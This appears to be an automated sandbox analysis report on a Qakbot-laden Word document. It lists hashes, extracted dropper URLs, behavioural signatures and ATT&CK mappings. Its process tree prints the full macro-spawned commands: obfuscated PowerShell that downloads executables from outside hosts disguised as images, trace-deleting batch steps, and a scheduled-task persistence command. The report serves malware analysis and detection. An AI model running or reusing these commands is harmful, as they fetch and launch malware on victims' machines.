Analysis

  • max time kernel: 140s
  • max time network: 146s
  • platform: windows10_x64
  • resource: win10v200430
  • submitted: 09-06-2020 11:55

General

  • Target: AGRMT_06052020_195.doc
  • Size: 220KB
  • MD5: bc8cf7a3c840dc88cfa89f69852e46e6
  • SHA1: 1528a5750c9072ebbc963687079c010b18240c9e
  • SHA256: e0dffa6bd2f4dd302690fc57b659149f59c394b4235edf33bf6a10ba0873dafc
  • SHA512: c2ed63d68e2f23917f448e8bda38058f7c6c02fce9b6fdd474983bed4e0e089759407d214f5eb307eb58101017a9918fae0307bdd10d1634ff26084eed7ea317

Malware Config

Extracted

  • Language: ps1
  • Source: URLs
  • exe.dropper: http://salwadm.com/tcphx/8888888.png

Extracted

  • Language: ps1
  • Source: URLs
  • exe.dropper: http://flipkenya.com/nujazbwrhjy/8888888.png

Extracted

  • Family: qakbot
  • Botnet: spx135
  • Campaign: 1591627649
  • C2:


Signatures

  • Blacklisted process makes network request 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Process spawned unexpected child process 7 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\AGRMT_06052020_195.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Suspicious use of FindShellTrayWindow
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    PID:1164
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c mkdir C:\Users\Public\tmpdir
      2⤵
      • Process spawned unexpected child process
      PID:3992
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 1 & Del C:\Users\Public\tmp.bat
      2⤵
      • Process spawned unexpected child process
      PID:3332
      • C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 1
        3⤵
          PID:1592
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
        2⤵
        • Process spawned unexpected child process
        PID:3416
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')
          3⤵
          • Blacklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3388
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
        2⤵
        • Process spawned unexpected child process
        PID:2352
        • C:\Windows\system32\choice.exe
          choice /C Y /N /D Y /T 65
          3⤵
            PID:1096
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e') >C:\Users\Public\2.txt
          2⤵
          • Process spawned unexpected child process
          PID:1532
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '2' + '.e' + 'x' + 'e')
            3⤵
            • Blacklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:764
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps2.bat & del C:\Users\Public\2.txt
          2⤵
          • Process spawned unexpected child process
          PID:3972
          • C:\Windows\system32\choice.exe
            choice /C Y /N /D Y /T 65
            3⤵
              PID:1608
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\Users\Public\tmpdir\tmps2.bat
            2⤵
            • Process spawned unexpected child process
            PID:3532
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 2
              3⤵
                PID:3436
                • C:\Windows\system32\choice.exe
                  choice /C Y /N /D Y /T 2
                  4⤵
                    PID:3936
                • C:\Users\Public\tmpdir\file2.exe
                  C:\Users\Public\tmpdir\file2.exe
                  3⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  • Executes dropped EXE
                  PID:3420
                  • C:\Users\Public\tmpdir\file2.exe
                    C:\Users\Public\tmpdir\file2.exe /C
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Checks SCSI registry key(s)
                    • Executes dropped EXE
                    PID:3416
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
                    C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of WriteProcessMemory
                    • Executes dropped EXE
                    PID:1992
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
                      C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe /C
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Checks SCSI registry key(s)
                      • Executes dropped EXE
                      PID:1612
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1912
                  • C:\Windows\SysWOW64\schtasks.exe
                    "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn txtmhfdmqz /tr "\"C:\Users\Public\tmpdir\file2.exe\" /I txtmhfdmqz" /SC ONCE /Z /ST 14:09 /ET 14:21
                    4⤵
                    • Creates scheduled task(s)
                    PID:3928

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Execution: Scheduled Task (1) T1053
  • Persistence: Scheduled Task (1) T1053
  • Privilege Escalation: Scheduled Task (1) T1053
  • Discovery: Query Registry (3) T1012; System Information Discovery (3) T1082; Peripheral Device Discovery (1) T1120


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.dat
  • C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
  • C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
  • C:\Users\Admin\AppData\Roaming\Microsoft\Armbughouj\nniglk.exe
  • C:\Users\Public\1.txt
  • C:\Users\Public\tmp.bat
  • C:\Users\Public\tmpdir\file2.exe
  • C:\Users\Public\tmpdir\file2.exe
  • C:\Users\Public\tmpdir\file2.exe
  • C:\Users\Public\tmpdir\tmps2.bat
  • memory/1612-19-0x00000000027E0000-0x00000000027E1000-memory.dmp (Filesize: 4KB)
  • memory/1992-20-0x00000000022D0000-0x000000000230A000-memory.dmp (Filesize: 232KB)
  • memory/3416-15-0x0000000002700000-0x0000000002701000-memory.dmp (Filesize: 4KB)